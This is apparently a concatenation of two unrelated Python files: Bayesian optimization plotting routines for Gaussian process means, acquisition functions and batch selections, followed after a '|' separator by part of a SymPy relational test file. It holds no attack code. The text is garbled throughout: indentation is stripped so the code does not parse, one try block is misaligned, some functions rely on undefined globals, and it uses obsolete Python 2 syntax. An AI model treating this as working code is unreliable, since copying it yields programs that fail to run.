myplot.set_xlabel("Value",fontsize=16)
myplot.set_ylabel("Frequency",fontsize=16)
def plot_bo_1d(bo):
func=bo.f
#x_original = np.linspace(bo.bounds[0,0], bo.bounds[0,1], 100)
x = np.linspace(bo.scalebounds[0,0], bo.scalebounds[0,1], 1000)
x_original=x*bo.max_min_gap+bo.bounds[:,0]
y_original = func(x_original)
#y = func(x)
#y_original=mu*(np.max(bo.Y_original)-np.min(bo.Y_original))+np.mean(bo.Y_original)
fig=plt.figure(figsize=(8, 5))
fig.suptitle('Gaussian Process and Utility Function After {} Points'.format(len(bo.X)), fontdict={'size':18})
gs = gridspec.GridSpec(2, 1, height_ratios=[3, 1])
axis = plt.subplot(gs[0])
acq = plt.subplot(gs[1])
mu, sigma = bo.posterior(x)
#mu_original=mu*(np.max(y_original)-np.min(y_original))+np.mean(y_original)
mu_original=mu*(np.max(bo.Y_original)-np.min(bo.Y_original))+np.mean(bo.Y_original)
sigma_original=sigma*(np.max(bo.Y_original)-np.min(bo.Y_original))+np.mean(bo.Y_original)
axis.plot(x_original, y_original, linewidth=3, label='Real Function')
axis.plot(bo.X_original.flatten(), bo.Y_original, 'D', markersize=8, label=u'Observations', color='r')
axis.plot(x_original, mu_original, '--', color='k', label='GP mean')
#samples*bo.max_min_gap+bo.bounds[:,0]
temp_xaxis=np.concatenate([x_original, x_original[::-1]])
#temp_xaxis=temp*bo.max_min_gap+bo.bounds[:,0]
#temp_yaxis_original=np.concatenate([mu_original - 1.9600 * sigma_original, (mu_original + 1.9600 * sigma_original)[::-1]])
temp_yaxis=np.concatenate([mu - 1.9600 * sigma, (mu + 1.9600 * sigma)[::-1]])
temp_yaxis_original=temp_yaxis*(np.max(bo.Y_original)-np.min(bo.Y_original))+np.mean(bo.Y_original)
axis.fill(temp_xaxis, temp_yaxis_original,alpha=.6, fc='c', ec='None', label='95% CI')
axis.set_xlim((np.min(x_original), np.max(x_original)))
#axis.set_ylim((None, None))
axis.set_ylabel('f(x)', fontdict={'size':16})
axis.set_xlabel('x', fontdict={'size':16})
utility = bo.acq_func.acq_kind(x.reshape((-1, 1)), bo.gp, np.max(bo.Y))
acq.plot(x_original, utility, label='Utility Function', color='purple')
acq.plot(x_original[np.argmax(utility)], np.max(utility), '*', markersize=15,
label=u'Next Best Guess', markerfacecolor='gold', markeredgecolor='k', markeredgewidth=1)
# check batch BO
try:
        nSelectedPoints = int(bo.NumPoints[-1])
    except Exception:
        nSelectedPoints = 1
max_point=np.max(utility)
acq.plot(bo.X_original[-nSelectedPoints:], max_point.repeat(nSelectedPoints), 'v', markersize=15,
label=u'Previous Selection', markerfacecolor='green', markeredgecolor='k', markeredgewidth=1)
acq.set_xlim((np.min(x_original), np.max(x_original)))
#acq.set_ylim((0, np.max(utility) + 0.5))
acq.set_ylim((np.min(utility), 1.1*np.max(utility)))
acq.set_ylabel('Acq', fontdict={'size':16})
acq.set_xlabel('x', fontdict={'size':16})
axis.legend(loc=2, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
acq.legend(loc=2, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
def plot_bo_2d(bo):
x1 = np.linspace(bo.scalebounds[0,0], bo.scalebounds[0,1], 100)
x2 = np.linspace(bo.scalebounds[1,0], bo.scalebounds[1,1], 100)
x1g,x2g=np.meshgrid(x1,x2)
X=np.c_[x1g.flatten(), x2g.flatten()]
x1_ori = np.linspace(bo.bounds[0,0], bo.bounds[0,1], 100)
x2_ori = np.linspace(bo.bounds[1,0], bo.bounds[1,1], 100)
x1g_ori,x2g_ori=np.meshgrid(x1_ori,x2_ori)
X_ori=np.c_[x1g_ori.flatten(), x2g_ori.flatten()]
fig = plt.figure()
#axis2d = fig.add_subplot(1, 2, 1)
acq2d = fig.add_subplot(1, 1, 1)
#mu, sigma = bo.posterior(X)
# plot the acquisition function
utility = bo.acq_func.acq_kind(X, bo.gp, np.max(bo.Y))
#acq3d.plot_surface(x1g,x1g,utility.reshape(x1g.shape))
CS_acq=acq2d.contourf(x1g_ori,x2g_ori,utility.reshape(x1g.shape),cmap=my_cmap,origin='lower')
CS2_acq = plt.contour(CS_acq, levels=CS_acq.levels[::2],colors='r',origin='lower',hold='on')
idxBest=np.argmax(utility)
#acq2d.scatter(X_ori[idxBest,0],X_ori[idxBest,1],color='b',s=30,label='Current Peak')
#acq2d.scatter(bo.X_original[:,0],bo.X_original[:,1],color='g',label='Observations')
#acq2d.scatter(bo.X_original[-1,0],bo.X_original[-1,1],color='r',s=30,label='Previous Selection')
acq2d.scatter(bo.X_original[-1,0],bo.X_original[-1,1],marker='*', color='green',s=100,label='Previous Selection')
acq2d.set_title('Acquisition Function',fontsize=16)
acq2d.set_xlim(bo.bounds[0,0], bo.bounds[0,1])
acq2d.set_ylim(bo.bounds[1,0], bo.bounds[1,1])
#acq2d.legend(loc=1, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
#acq2d.legend(loc='center left',bbox_to_anchor=(1.01, 0.5))
fig.colorbar(CS_acq, ax=acq2d, shrink=0.9)
#acq.set_xlim((np.min(x), np.max(x)))
#acq.set_ylim((np.min(utility), 1.1*np.max(utility)))
#acq.set_ylabel('Acq', fontdict={'size':16})
#acq.set_xlabel('x', fontdict={'size':16})
#axis.legend(loc=2, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
#acq.legend(loc=2, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
def plot_bo_2d_FBO(bo,myfunction):
global counter
counter=counter+1
strFolder="P:\\03.Research\\05.BayesianOptimization\\PradaBayesianOptimization\\plot_Nov_2016"
x1 = np.linspace(bo.scalebounds[0,0], bo.scalebounds[0,1], 100)
x2 = np.linspace(bo.scalebounds[1,0], bo.scalebounds[1,1], 100)
x1g,x2g=np.meshgrid(x1,x2)
X=np.c_[x1g.flatten(), x2g.flatten()]
x1_ori = np.linspace(bo.bounds[0,0], bo.bounds[0,1], 100)
x2_ori = np.linspace(bo.bounds[1,0], bo.bounds[1,1], 100)
x1g_ori,x2g_ori=np.meshgrid(x1_ori,x2_ori)
X_ori=np.c_[x1g_ori.flatten(), x2g_ori.flatten()]
fig = plt.figure(figsize=(10, 3.5))
#axis2d = fig.add_subplot(1, 2, 1)
# plot invasion set
acq_expansion = fig.add_subplot(1, 2, 1)
x1 = np.linspace(bo.b_limit_lower[0], bo.b_limit_upper[0], 100)
x2 = np.linspace(bo.b_limit_lower[1], bo.b_limit_upper[1], 100)
x1g_ori_limit,x2g_ori_limit=np.meshgrid(x1,x2)
X_plot=np.c_[x1g_ori_limit.flatten(), x2g_ori_limit.flatten()]
Y = myfunction.func(X_plot)
Y=-np.log(np.abs(Y))
CS_expansion=acq_expansion.contourf(x1g_ori_limit,x2g_ori_limit,Y.reshape(x1g_ori.shape),cmap=my_cmap,origin='lower')
if len(bo.X_invasion)!=0:
myinvasion_set=acq_expansion.scatter(bo.X_invasion[:,0],bo.X_invasion[:,1],color='m',s=1,label='Invasion Set')
else:
myinvasion_set=[]
myrectangle=patches.Rectangle(bo.bounds_bk[:,0], bo.max_min_gap_bk[0],bo.max_min_gap_bk[1],
alpha=0.3, fill=False, facecolor="#00ffff",linewidth=3)
acq_expansion.add_patch(myrectangle)
acq_expansion.set_xlim(bo.b_limit_lower[0]-0.2, bo.b_limit_upper[0]+0.2)
acq_expansion.set_ylim(bo.b_limit_lower[1]-0.2, bo.b_limit_upper[1]+0.2)
if len(bo.X_invasion)!=0:
acq_expansion.legend([myrectangle,myinvasion_set],[ur'$X_{t-1}$',ur'$I_t$'],loc=4,ncol=1,prop={'size':16},scatterpoints = 5)
strTitle_Inv="[t={:d}] Invasion Set".format(counter)
acq_expansion.set_title(strTitle_Inv,fontsize=16)
else:
acq_expansion.legend([myrectangle,myinvasion_set],[ur'$X_{t-1}$',ur'Empty $I_t$'],loc=4,ncol=1,prop={'size':16},scatterpoints = 5)
strTitle_Inv="[t={:d}] Empty Invasion Set".format(counter)
acq_expansion.set_title(strTitle_Inv,fontsize=16)
# plot acquisition function
acq2d = fig.add_subplot(1, 2, 2)
utility = bo.acq_func.acq_kind(X, bo.gp, np.max(bo.Y))
#acq3d.plot_surface(x1g,x1g,utility.reshape(x1g.shape))
CS_acq=acq2d.contourf(x1g_ori,x2g_ori,utility.reshape(x1g.shape),cmap=my_cmap,origin='lower')
CS2_acq = plt.contour(CS_acq, levels=CS_acq.levels[::2],colors='r',origin='lower',hold='on')
idxBest=np.argmax(utility)
myrectangle=patches.Rectangle(bo.bounds[:,0], bo.max_min_gap[0],bo.max_min_gap[1],
alpha=0.3, fill=False, facecolor="#00ffff",linewidth=3)
acq2d.add_patch(myrectangle)
#acq2d.scatter(X_ori[idxBest,0],X_ori[idxBest,1],color='b',s=30,label='Current Peak')
myobs=acq2d.scatter(bo.X_original[:,0],bo.X_original[:,1],color='g',s=6,label='Data')
#acq2d.scatter(bo.X_original[-1,0],bo.X_original[-1,1],color='r',s=30,label='Previous Selection')
#acq2d.set_xlim(bo.bounds[0,0], bo.bounds[0,1])
#acq2d.set_ylim(bo.bounds[1,0], bo.bounds[1,1])
acq2d.set_xlim(bo.b_limit_lower[0]-0.2, bo.b_limit_upper[0]+0.2)
acq2d.set_ylim(bo.b_limit_lower[1]-0.2, bo.b_limit_upper[1]+0.2)
#acq2d.legend(loc=1, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
#acq2d.legend(loc='center left',bbox_to_anchor=(1.2, 0.5))
#acq2d.legend(loc=4)
acq2d.legend([myrectangle,myobs],[ur'$X_{t}$','Data'],loc=4,ncol=1,prop={'size':16}, scatterpoints = 3)
strTitle_Acq="[t={:d}] Acquisition Func".format(counter)
acq2d.set_title(strTitle_Acq,fontsize=16)
fig.colorbar(CS_expansion, ax=acq_expansion, shrink=0.9)
fig.colorbar(CS_acq, ax=acq2d, shrink=0.9)
#acq.set_xlim((np.min(x), np.max(x)))
#acq.set_ylim((np.min(utility), 1.1*np.max(utility)))
#acq.set_ylabel('Acq', fontdict={'size':16})
#acq.set_xlabel('x', fontdict={'size':16})
#axis.legend(loc=2, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
#acq.legend(loc=2, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
strFileName="{:d}_bubo.eps".format(counter)
strPath=os.path.join(strFolder,strFileName)
#print strPath
#fig.savefig(strPath, bbox_inches='tight')
def plot_bo_2d_withGPmeans(bo):
x1 = np.linspace(bo.scalebounds[0,0], bo.scalebounds[0,1], 100)
x2 = np.linspace(bo.scalebounds[1,0], bo.scalebounds[1,1], 100)
x1g,x2g=np.meshgrid(x1,x2)
X=np.c_[x1g.flatten(), x2g.flatten()]
x1_ori = np.linspace(bo.bounds[0,0], bo.bounds[0,1], 100)
x2_ori = np.linspace(bo.bounds[1,0], bo.bounds[1,1], 100)
x1g_ori,x2g_ori=np.meshgrid(x1_ori,x2_ori)
X_ori=np.c_[x1g_ori.flatten(), x2g_ori.flatten()]
#fig.suptitle('Gaussian Process and Utility Function After {} Points'.format(len(bo.X)), fontdict={'size':18})
fig = plt.figure(figsize=(12, 5))
#axis3d = fig.add_subplot(1, 2, 1, projection='3d')
axis2d = fig.add_subplot(1, 2, 1)
#acq3d = fig.add_subplot(2, 2, 3, projection='3d')
acq2d = fig.add_subplot(1, 2, 2)
mu, sigma = bo.posterior(X)
#axis.plot(x, y, linewidth=3, label='Target')
#axis3d.plot_surface(x1g,x1g,mu.reshape(x1g.shape))
#axis3d.scatter(bo.X[:,0],bo.X[:,1], bo.Y,zdir='z', label=u'Observations', color='r')
CS=axis2d.contourf(x1g_ori,x2g_ori,mu.reshape(x1g.shape),cmap=plt.cm.bone,origin='lower')
CS2 = plt.contour(CS, levels=CS.levels[::2],colors='r',origin='lower',hold='on')
axis2d.scatter(bo.X_original[:,0],bo.X_original[:,1], label=u'Observations', color='g')
axis2d.set_title('Gaussian Process Mean',fontsize=16)
axis2d.set_xlim(bo.bounds[0,0], bo.bounds[0,1])
axis2d.set_ylim(bo.bounds[1,0], bo.bounds[1,1])
fig.colorbar(CS, ax=axis2d, shrink=0.9)
#plt.colorbar(ax=axis2d)
#axis.plot(x, mu, '--', color='k', label='Prediction')
#axis.set_xlim((np.min(x), np.max(x)))
#axis.set_ylim((None, None))
#axis.set_ylabel('f(x)', fontdict={'size':16})
#axis.set_xlabel('x', fontdict={'size':16})
# plot the acquisition function
utility = bo.acq_func.acq_kind(X, bo.gp, np.max(bo.Y))
#acq3d.plot_surface(x1g,x1g,utility.reshape(x1g.shape))
#CS_acq=acq2d.contourf(x1g_ori,x2g_ori,utility.reshape(x1g.shape),cmap=plt.cm.bone,origin='lower')
CS_acq=acq2d.contourf(x1g_ori,x2g_ori,utility.reshape(x1g.shape),cmap=my_cmap,origin='lower')
CS2_acq = plt.contour(CS_acq, levels=CS_acq.levels[::2],colors='r',origin='lower',hold='on')
idxBest=np.argmax(utility)
acq2d.scatter(bo.X_original[:,0],bo.X_original[:,1],color='g')
acq2d.scatter(bo.X_original[-1,0],bo.X_original[-1,1],color='r',s=60)
acq2d.scatter(X_ori[idxBest,0],X_ori[idxBest,1],color='b',s=60)
acq2d.set_title('Acquisition Function',fontsize=16)
acq2d.set_xlim(bo.bounds[0,0]-0.2, bo.bounds[0,1]+0.2)
acq2d.set_ylim(bo.bounds[1,0]-0.2, bo.bounds[1,1]+0.2)
#acq.set_xlim((np.min(x), np.max(x)))
#acq.set_ylim((np.min(utility), 1.1*np.max(utility)))
#acq.set_ylabel('Acq', fontdict={'size':16})
#acq.set_xlabel('x', fontdict={'size':16})
#axis.legend(loc=2, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
#acq.legend(loc=2, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
fig.colorbar(CS_acq, ax=acq2d, shrink=0.9)
def plot_bo_2d_withGPmeans_Sigma(bo):
x1 = np.linspace(bo.scalebounds[0,0], bo.scalebounds[0,1], 100)
x2 = np.linspace(bo.scalebounds[1,0], bo.scalebounds[1,1], 100)
x1g,x2g=np.meshgrid(x1,x2)
X=np.c_[x1g.flatten(), x2g.flatten()]
x1_ori = np.linspace(bo.bounds[0,0], bo.bounds[0,1], 100)
x2_ori = np.linspace(bo.bounds[1,0], bo.bounds[1,1], 100)
x1g_ori,x2g_ori=np.meshgrid(x1_ori,x2_ori)
X_ori=np.c_[x1g_ori.flatten(), x2g_ori.flatten()]
#fig.suptitle('Gaussian Process and Utility Function After {} Points'.format(len(bo.X)), fontdict={'size':18})
fig = plt.figure(figsize=(12, 3))
#axis3d = fig.add_subplot(1, 2, 1, projection='3d')
axis2d = fig.add_subplot(1, 2, 1)
#acq3d = fig.add_subplot(2, 2, 3, projection='3d')
acq2d = fig.add_subplot(1, 2, 2)
mu, sigma = bo.posterior(X)
#axis.plot(x, y, linewidth=3, label='Target')
#axis3d.plot_surface(x1g,x1g,mu.reshape(x1g.shape))
#axis3d.scatter(bo.X[:,0],bo.X[:,1], bo.Y,zdir='z', label=u'Observations', color='r')
utility = bo.acq_func.acq_kind(X, bo.gp, np.max(bo.Y))
CS=axis2d.contourf(x1g_ori,x2g_ori,mu.reshape(x1g.shape),cmap=plt.cm.bone,origin='lower')
CS2 = plt.contour(CS, levels=CS.levels[::2],colors='r',origin='lower',hold='on')
axis2d.scatter(bo.X_original[:,0],bo.X_original[:,1], label=u'Observations', color='g')
axis2d.set_title('Gaussian Process Mean',fontsize=16)
axis2d.set_xlim(bo.bounds[0,0], bo.bounds[0,1])
axis2d.set_ylim(bo.bounds[1,0], bo.bounds[1,1])
fig.colorbar(CS, ax=axis2d, shrink=0.9)
#CS_acq=acq2d.contourf(x1g_ori,x2g_ori,utility.reshape(x1g.shape),cmap=plt.cm.bone,origin='lower')
CS_acq=acq2d.contourf(x1g_ori,x2g_ori,sigma.reshape(x1g.shape),cmap=my_cmap,origin='lower')
CS2_acq = plt.contour(CS_acq, levels=CS_acq.levels[::2],colors='r',origin='lower',hold='on')
idxBest=np.argmax(utility)
acq2d.scatter(bo.X_original[:,0],bo.X_original[:,1],color='g')
acq2d.scatter(bo.X_original[-1,0],bo.X_original[-1,1],color='r',s=60)
acq2d.scatter(X_ori[idxBest,0],X_ori[idxBest,1],color='b',s=60)
acq2d.set_title('Gaussian Process Variance',fontsize=16)
#acq2d.set_xlim(bo.bounds[0,0]-0.2, bo.bounds[0,1]+0.2)
#acq2d.set_ylim(bo.bounds[1,0]-0.2, bo.bounds[1,1]+0.2)
fig.colorbar(CS_acq, ax=acq2d, shrink=0.9)
def plot_gp_batch(self,x,y):
bo=self.myBo
n_batch=bo.NumPoints
fig=plt.figure(figsize=(16, 10))
fig.suptitle('Gaussian Process and Utility Function After {} Steps'.format(len(bo.X)), fontdict={'size':30})
gs = gridspec.GridSpec(2, 1, height_ratios=[3, 1])
axis = plt.subplot(gs[0])
acq = plt.subplot(gs[1])
mu, sigma = posterior(bo)
axis.plot(x, y, linewidth=3, label='Target')
axis.plot(bo.X.flatten(), bo.Y, 'D', markersize=8, label=u'Observations', color='r')
axis.plot(x, mu, '--', color='k', label='GP mean')
axis.fill(np.concatenate([x, x[::-1]]),
np.concatenate([mu - 1.9600 * sigma, (mu + 1.9600 * sigma)[::-1]]),
alpha=.6, fc='c', ec='None', label='95% confidence interval')
axis.set_xlim((-2, 10))
axis.set_ylim((None, None))
axis.set_ylabel('f(x)', fontdict={'size':20})
axis.set_xlabel('x', fontdict={'size':20})
utility = bo.acq_func.acq_kind(x.reshape((-1, 1)), bo.gp, 0)
acq.plot(x, utility, label='Utility Function', color='purple')
#selected_x=x[np.argmax(utility)]
#selected_y=np.max(utility)
selected_x=bo.X[-1-n_batch:]
selected_y=utility(selected_x)
acq.plot(selected_x, selected_y,'*', markersize=15,
label=u'Next Best Guess', markerfacecolor='gold', markeredgecolor='k', markeredgewidth=1)
acq.set_xlim((-2, 10))
acq.set_ylim((0, np.max(utility) + 0.5))
acq.set_ylabel('Utility', fontdict={'size':20})
acq.set_xlabel('x', fontdict={'size':20})
axis.legend(loc=2, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
acq.legend(loc=2, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
def plot_original_function(myfunction):
origin = 'lower'
func=myfunction.func
if myfunction.input_dim==1:
x = np.linspace(myfunction.bounds['x'][0], myfunction.bounds['x'][1], 1000)
y = func(x)
fig=plt.figure(figsize=(8, 5))
plt.plot(x, y)
strTitle="{:s}".format(myfunction.name)
plt.title(strTitle)
if myfunction.input_dim==2:
# Create an array with parameters bounds
if isinstance(myfunction.bounds,dict):
# Get the name of the parameters
bounds = []
for key in myfunction.bounds.keys():
bounds.append(myfunction.bounds[key])
bounds = np.asarray(bounds)
else:
bounds=np.asarray(myfunction.bounds)
x1 = np.linspace(bounds[0][0], bounds[0][1], 100)
x2 = np.linspace(bounds[1][0], bounds[1][1], 100)
x1g,x2g=np.meshgrid(x1,x2)
X_plot=np.c_[x1g.flatten(), x2g.flatten()]
Y = func(X_plot)
#fig=plt.figure(figsize=(8, 5))
#fig = plt.figure(figsize=(12, 3.5))
fig = plt.figure(figsize=(6, 3.5))
ax3d = fig.add_subplot(1, 1, 1, projection='3d')
#ax2d = fig.add_subplot(1, 2, 2)
ax3d.plot_surface(x1g,x2g,Y.reshape(x1g.shape),cmap=my_cmap)
alpha = 30 # degrees
#mlab.view(azimuth=0, elevation=90, roll=-90+alpha)
strTitle="{:s}".format(myfunction.name)
#print strTitle
ax3d.set_title(strTitle)
#plt.plot(x, y)
#CS=ax2d.contourf(x1g,x2g,Y.reshape(x1g.shape),cmap=my_cmap,origin=origin)
#CS2 = plt.contour(CS, levels=CS.levels[::2],colors='r',origin=origin,hold='on')
#plt.colorbar(CS2, ax=ax2d, shrink=0.9)
strFolder="P:\\03.Research\\05.BayesianOptimization\\PradaBayesianOptimization\\plot_August_2016\\ei_eli"
strFileName="{:s}.eps".format(myfunction.name)
strPath=os.path.join(strFolder,strFileName)
#fig.savefig(strPath, bbox_inches='tight')
def plot_bo_multiple_gp_1d(bo):
func=bo.f
x = np.linspace(bo.scalebounds[0,0], bo.scalebounds[0,1], 1000)
x_original=x*bo.max_min_gap+bo.bounds[:,0]
y_original = func(x_original)
fig=plt.figure(figsize=(10, 5))
fig.suptitle('Gaussian Process and Utility Function After {} Points'.format(len(bo.X)), fontdict={'size':18})
gs = gridspec.GridSpec(3, 1, height_ratios=[3,1,1])
axis = plt.subplot(gs[0])
acq = plt.subplot(gs[1])
acq_integrated=plt.subplot(gs[2])
mu, sigma = bo.posterior(x)
#mu_original=mu*(np.max(bo.Y_original)-np.min(bo.Y_original))+np.mean(bo.Y_original)
nGP=len(mu)
axis.plot(x_original, y_original, linewidth=3, label='Real Function')
axis.plot(bo.X_original.flatten(), bo.Y_original, 'D', markersize=8, label=u'Observations', color='r')
for idx in range(nGP):
mu_original=mu[idx]*(np.max(bo.Y_original)-np.min(bo.Y_original))+np.mean(bo.Y_original)
axis.plot(x_original,mu_original,'--',color = "#%06x" % random.randint(0, 0xFFFFFF),label='GP Theta={:.2f}'.format(bo.theta[idx]),linewidth=2)
temp_xaxis=np.concatenate([x_original, x_original[::-1]])
temp_yaxis=np.concatenate([mu[idx] - 1.9600 * sigma[idx], (mu[idx] + 1.9600 * sigma[idx])[::-1]])
temp_yaxis_original=temp_yaxis*(np.max(bo.Y_original)-np.min(bo.Y_original))+np.mean(bo.Y_original)
axis.fill(temp_xaxis, temp_yaxis_original,alpha=.6, fc='c', ec='None', label='95% CI')
#axis.set_xlim((np.min(x), np.max(x)))
axis.set_ylim((np.min(y_original)*2, np.max(y_original)*2))
axis.set_ylabel('f(x)', fontdict={'size':16})
axis.set_xlabel('x', fontdict={'size':16})
## estimate the utility
utility = bo.acq_func.acq_kind(x.reshape((-1, 1)), bo.gp, bo.Y.max())
for idx in range(nGP):
acq.plot(x_original, utility[idx], label='Acq Func GP {:.2f}'.format(bo.theta[idx]),
color="#%06x" % random.randint(0, 0xFFFFFF),linewidth=2)
acq.plot(x_original[np.argmax(utility[idx])], np.max(utility[idx]), '*', markersize=15,
label=u'Next Guess GP {:.2f}'.format(bo.theta[idx]), markerfacecolor='gold', markeredgecolor='k', markeredgewidth=1)
acq.set_xlim((np.min(x_original), np.max(x_original)))
#acq.set_ylim((0, np.max(utility[0]) + 0.5))
acq.set_ylabel('Acq', fontdict={'size':16})
acq.set_xlabel('x', fontdict={'size':16})
axis.legend(loc=2, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
acq.legend(loc=2, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
## estimate the integrated acquisition function
util_integrated = bo.acq_func.utility_plot(x.reshape((-1, 1)), bo.gp, bo.Y.max())
acq_integrated.plot(x, util_integrated, label='Acq Int-Func GP',
color="#%06x" % random.randint(0, 0xFFFFFF),linewidth=2)
acq_integrated.plot(x[np.argmax(util_integrated)], np.max(util_integrated), '*', markersize=15,
label=u'Next Guess', markerfacecolor='gold', markeredgecolor='k', markeredgewidth=1)
acq_integrated.set_xlim((np.min(x), np.max(x)))
acq_integrated.set_ylim((0, np.max(util_integrated) + 0.1))
acq_integrated.set_ylabel('Int-Acq', fontdict={'size':16})
acq_integrated.set_xlabel('x', fontdict={'size':16})
axis.legend(loc=2, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
acq.legend(loc=2, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
acq_integrated.legend(loc=2, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
#===========================================
def plot_gp_batch(bo,x,y):
n_batch=bo.NumPoints[-1]
x1 = np.linspace(bo.scalebounds[0,0], bo.scalebounds[0,1], 100)
x2 = np.linspace(bo.scalebounds[1,0], bo.scalebounds[1,1], 100)
x1g,x2g=np.meshgrid(x1,x2)
X=np.c_[x1g.flatten(), x2g.flatten()]
x1_ori = np.linspace(bo.bounds[0,0], bo.bounds[0,1], 100)
x2_ori = np.linspace(bo.bounds[1,0], bo.bounds[1,1], 100)
x1g_ori,x2g_ori=np.meshgrid(x1_ori,x2_ori)
X_ori=np.c_[x1g_ori.flatten(), x2g_ori.flatten()]
fig = plt.figure()
#axis2d = fig.add_subplot(1, 2, 1)
acq2d = fig.add_subplot(1, 1, 1)
#mu, sigma = bo.posterior(X)
# plot the acquisition function
utility = bo.acq_func.acq_kind(X, bo.gp, np.max(bo.Y))
#acq3d.plot_surface(x1g,x1g,utility.reshape(x1g.shape))
CS_acq=acq2d.contourf(x1g_ori,x2g_ori,utility.reshape(x1g.shape),cmap=my_cmap,origin='lower')
CS2_acq = plt.contour(CS_acq, levels=CS_acq.levels[::2],colors='r',origin='lower',hold='on')
idxBest=np.argmax(utility)
#acq2d.scatter(X_ori[idxBest,0],X_ori[idxBest,1],color='b',s=30,label='Current Peak')
#acq2d.scatter(bo.X_original[:,0],bo.X_original[:,1],color='g',label='Observations')
#acq2d.scatter(bo.X_original[-1,0],bo.X_original[-1,1],color='r',s=30,label='Previous Selection')
acq2d.scatter(bo.X_original[:,0],bo.X_original[:,1], marker='*',label=u'Estimated Peaks by IGMM', s=100,color='green')
acq2d.set_title('Acquisition Function',fontsize=16)
acq2d.set_xlim(bo.bounds[0,0], bo.bounds[0,1])
acq2d.set_ylim(bo.bounds[1,0], bo.bounds[1,1])
#acq2d.legend(loc=1, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
#acq2d.legend(loc='center left',bbox_to_anchor=(1.01, 0.5))
fig.colorbar(CS_acq, ax=acq2d, shrink=0.9)
def plot_gp_sequential_batch(bo,x_seq,x_batch):
global counter
counter=counter+1
x1 = np.linspace(bo.scalebounds[0,0], bo.scalebounds[0,1], 100)
x2 = np.linspace(bo.scalebounds[1,0], bo.scalebounds[1,1], 100)
x1g,x2g=np.meshgrid(x1,x2)
X=np.c_[x1g.flatten(), x2g.flatten()]
x1_ori = np.linspace(bo.bounds[0,0], bo.bounds[0,1], 100)
x2_ori = np.linspace(bo.bounds[1,0], bo.bounds[1,1], 100)
x1g_ori,x2g_ori=np.meshgrid(x1_ori,x2_ori)
X_ori=np.c_[x1g_ori.flatten(), x2g_ori.flatten()]
fig=plt.figure(figsize=(10, 3))
#axis2d = fig.add_subplot(1, 2, 1)
acq2d_seq = fig.add_subplot(1, 2, 1)
acq2d_batch = fig.add_subplot(1, 2, 2)
#mu, sigma = bo.posterior(X)
# plot the acquisition function
utility = bo.acq_func.acq_kind(X, bo.gp, np.max(bo.Y))
#acq3d.plot_surface(x1g,x1g,utility.reshape(x1g.shape))
CS_acq=acq2d_seq.contourf(x1g_ori,x2g_ori,utility.reshape(x1g.shape),cmap=my_cmap,origin='lower')
#CS2_acq = plt.contour(CS_acq, levels=CS_acq.levels[::2],colors='r',origin='lower',hold='on')
acq2d_seq.scatter(x_seq[0],x_seq[1], marker='*',label=u'Estimated Peaks by IGMM', s=100,color='green')
acq2d_seq.set_title('Sequential Bayesian Optimization',fontsize=16)
acq2d_seq.set_xlim(bo.bounds[0,0]-0.2, bo.bounds[0,1]+0.2)
acq2d_seq.set_ylim(bo.bounds[1,0]-0.2, bo.bounds[1,1]+0.2)
#acq2d.legend(loc=1, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
#acq2d.legend(loc='center left',bbox_to_anchor=(1.01, 0.5))
fig.colorbar(CS_acq, ax=acq2d_seq, shrink=0.9)
CS_acq_batch=acq2d_batch.contourf(x1g_ori,x2g_ori,utility.reshape(x1g.shape),cmap=my_cmap,origin='lower')
#CS2_acq_batch = plt.contour(CS_acq_batch, levels=CS_acq_batch.levels[::2],colors='r',origin='lower',hold='on')
acq2d_batch.scatter(x_batch[:,0],x_batch[:,1], marker='*',label=u'Estimated Peaks by IGMM', s=100,color='green')
acq2d_batch.set_title('Batch Bayesian Optimization',fontsize=16)
acq2d_batch.set_xlim(bo.bounds[0,0]-0.2, bo.bounds[0,1]+0.2)
acq2d_batch.set_ylim(bo.bounds[1,0]-0.2, bo.bounds[1,1]+0.2)
fig.colorbar(CS_acq_batch, ax=acq2d_batch, shrink=0.9)
strFolder="V:\\plot_Nov_2016\\sequential_batch"
strFileName="{:d}.eps".format(counter)
strPath=os.path.join(strFolder,strFileName)
fig.savefig(strPath, bbox_inches='tight')
|
from sympy.utilities.pytest import XFAIL, raises
from sympy import (S, Symbol, symbols, nan, oo, I, pi, Float, And, Or,
Not, Implies, Xor, zoo, sqrt, Rational, simplify, Function, Eq,
log, cos, sin)
from sympy.core.compatibility import range
from sympy.core.relational import (Relational, Equality, Unequality,
GreaterThan, LessThan, StrictGreaterThan,
StrictLessThan, Rel, Eq, Lt, Le,
Gt, Ge, Ne)
from sympy.sets.sets import Interval, FiniteSet
x, y, z, t = symbols('x,y,z,t')
def test_rel_ne():
assert Relational(x, y, '!=') == Ne(x, y)
# issue 6116
p = Symbol('p', positive=True)
assert Ne(p, 0) is S.true
def test_rel_subs():
e = Relational(x, y, '==')
e = e.subs(x, z)
assert isinstance(e, Equality)
assert e.lhs == z
assert e.rhs == y
e = Relational(x, y, '>=')
e = e.subs(x, z)
assert isinstance(e, GreaterThan)
assert e.lhs == z
assert e.rhs == y
e = Relational(x, y, '<=')
e = e.subs(x, z)
assert isinstance(e, LessThan)
assert e.lhs == z
assert e.rhs == y
e = Relational(x, y, '>')
e = e.subs(x, z)
assert isinstance(e, StrictGreaterThan)
assert e.lhs == z
assert e.rhs == y
e = Relational(x, y, '<')
e = e.subs(x, z)
assert isinstance(e, StrictLessThan)
assert e.lhs == z
assert e.rhs == y
e = Eq(x, 0)
assert e.subs(x, 0) is S.true
assert e.subs(x, 1) is S.false
def test_wrappers():
e = x + x**2
res = Relational(y, e, '==')
assert Rel(y, x + x**2, '==') == res
assert Eq(y, x + x**2) == res
res = Relational(y, e, '<')
assert Lt(y, x + x**2) == res
